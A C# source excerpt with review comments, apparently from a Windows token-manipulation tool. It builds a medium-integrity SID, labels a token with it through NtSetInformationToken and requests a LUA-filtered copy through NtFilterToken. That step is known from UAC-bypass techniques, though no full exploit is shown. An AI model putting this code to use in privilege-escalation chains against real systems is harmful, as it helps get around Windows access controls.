// Managed signature for the native AllocateAndInitializeSid routine; the call
// site in this file reaches it as advapi32.AllocateAndInitializeSid.
//
//   pIdentifierAuthority  top-level identifier authority of the SID to build
//   nSubAuthorityCount    how many of the dwSubAuthorityN slots are meaningful
//   dwSubAuthority0..7    sub-authority values (native DWORDs, declared here as
//                         signed 32-bit integers of the same width)
//   pSid                  receives a pointer to the SID allocated by the system
//
// Returns true on success. Win32 documents FreeSid as the matching release call
// for the buffer handed back through pSid.
// NOTE(review): the [DllImport] attribute for this declaration is not visible
// in this excerpt, so SetLastError behaviour cannot be confirmed from here.
public static extern bool AllocateAndInitializeSid(
    ref Structs.SidIdentifierAuthority pIdentifierAuthority,
    byte nSubAuthorityCount,
    int dwSubAuthority0,
    int dwSubAuthority1,
    int dwSubAuthority2,
    int dwSubAuthority3,
    int dwSubAuthority4,
    int dwSubAuthority5,
    int dwSubAuthority6,
    int dwSubAuthority7,
    out IntPtr pSid
);
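////////////////////////////////////////////////////////////////////////////////
// Stamps a mandatory integrity label onto phNewToken and then requests a
// filtered copy of that token.
//
// Steps, as written below:
//   1. Build a one-sub-authority SID from authority {0,0,0,0,0,0x10} and
//      sub-authority 0x2000, i.e. S-1-16-8192. In the Windows SDK that is the
//      mandatory-label authority with the medium integrity RID.
//   2. Wrap the SID in a TOKEN_MANDATORY_LABEL and pass it to
//      NtSetInformationToken with information class 25 (TokenIntegrityLevel
//      in the Windows SDK enumeration).
//   3. Call NtFilterToken with flags value 4 (LUA_TOKEN in the Windows SDK) to
//      obtain a filtered token handle.
//
// Review notes:
//   - The SID allocated in step 1 is never released in this method; Win32
//     documents FreeSid for that. No FreeSid declaration is visible in this
//     excerpt, so the call is flagged here rather than added.
//   - The handle produced in step 3 is only printed. It is neither stored nor
//     closed in the visible code, so it is leaked unless the caller obtains it
//     some other way.
//   - Nt* routines report failure through their NTSTATUS return value.
//     NOTE(review): confirm that GetError surfaces that status rather than the
//     thread's last Win32 error, otherwise the printed reason may be unrelated.
////////////////////////////////////////////////////////////////////////////////
public void SetTokenInformation()
{
    Structs.SidIdentifierAuthority pIdentifierAuthority = new Structs.SidIdentifierAuthority();
    pIdentifierAuthority.Value = new byte[] { 0x0, 0x0, 0x0, 0x0, 0x0, 0x10 };
    byte nSubAuthorityCount = 1;

    IntPtr pSID = IntPtr.Zero;
    if (!advapi32.AllocateAndInitializeSid(ref pIdentifierAuthority, nSubAuthorityCount, 0x2000, 0, 0, 0, 0, 0, 0, 0, out pSID))
    {
        // Without a SID there is no label to apply; report and stop instead of
        // handing a null SID pointer to NtSetInformationToken.
        GetError("AllocateAndInitializeSid: ");
        return;
    }
    // ToInt64 instead of ToInt32: a heap pointer in a 64-bit process can exceed
    // the Int32 range, and IntPtr.ToInt32 throws OverflowException in that case.
    Console.WriteLine(" [+] Initialized SID : " + pSID.ToInt64());

    Structs.SID_AND_ATTRIBUTES sidAndAttributes = new Structs.SID_AND_ATTRIBUTES();
    sidAndAttributes.Sid = pSID;
    // presumably SE_GROUP_INTEGRITY (0x20); the constant's value is defined outside this excerpt
    sidAndAttributes.Attributes = Constants.SE_GROUP_INTEGRITY_32;

    Structs.TOKEN_MANDATORY_LABEL tokenMandatoryLabel = new Structs.TOKEN_MANDATORY_LABEL();
    tokenMandatoryLabel.Label = sidAndAttributes;
    Int32 labelSize = Marshal.SizeOf(tokenMandatoryLabel);

    // 25 == TokenIntegrityLevel. A zero return is treated as success.
    if (ntdll.NtSetInformationToken(phNewToken, 25, ref tokenMandatoryLabel, labelSize) == 0)
    {
        Console.WriteLine(" [+] Set Token Information : " + phNewToken.ToInt64());
    }
    else
    {
        // Failure is reported but, as in the original flow, filtering is still attempted.
        GetError("NtSetInformationToken: ");
    }

    // 4 == LUA_TOKEN. The three IntPtr.Zero arguments mean no extra SIDs to
    // disable, privileges to delete, or restricting SIDs are supplied.
    IntPtr luaToken = IntPtr.Zero;
    if (ntdll.NtFilterToken(phNewToken, 4, IntPtr.Zero, IntPtr.Zero, IntPtr.Zero, ref luaToken) == 0)
    {
        Console.WriteLine(" [+] Set LUA Token Information : " + luaToken.ToInt64());
    }
    else
    {
        GetError("NtFilterToken: ");
    }
}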